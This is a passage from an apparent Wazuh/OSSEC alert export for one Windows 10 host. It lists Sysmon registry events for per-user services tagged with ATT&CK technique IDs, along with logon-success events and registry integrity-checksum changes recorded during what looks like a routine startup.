11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:13.388",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.745948600Z"",""eventRecordID"":""913"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_376ac\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 11:01:13.359",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.738294800Z"",""eventRecordID"":""912"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 11:01:13.241",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.737609100Z"",""eventRecordID"":""911"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.174",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.736540700Z"",""eventRecordID"":""910"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 11:01:13.000",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.736236200Z"",""eventRecordID"":""909"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:12.867",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.703160900Z"",""eventRecordID"":""908"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 11:01:12.731",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.702285800Z"",""eventRecordID"":""907"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:12.701",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.701037800Z"",""eventRecordID"":""906"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 11:01:12.680",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.700226400Z"",""eventRecordID"":""905"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:12.661",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.699436700Z"",""eventRecordID"":""904"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.504\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.504"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.504 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 11:01:12.640",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.699230100Z"",""eventRecordID"":""903"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.504\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.504"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.504 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:07.806",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 11:01:06.984",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:06.922",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x2E3F1 + Linked Logon ID: 0x2E3B4 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. 
+ +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:06.890",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x2E3B4 + Linked Logon ID: 0x2E3F1 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. 
+ +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:05.995",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 11:01:03.588",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 11:00:32.982",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 11:00:32.964",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 10:59:46.589",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. 
+Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '822cb403c72a645a692b783c441badfe' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +", +"Apr 24, 2020 @ 10:59:46.574",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '822cb403c72a645a692b783c441badfe' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +", +"Apr 24, 2020 @ 10:59:34.949",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '1c76fe95384571894fea60032499598b' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'd5716310782cfc86d0c74a24cb1f7f269a683771' +", +"Apr 24, 2020 @ 10:59:34.933",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : 'ccf3312e10ed522b86fedf9f55f0ee11' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'aecc4f74462e7feab3e10f942d257edbd5ee7e0d' +", +"Apr 24, 2020 @ 10:59:22.308",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
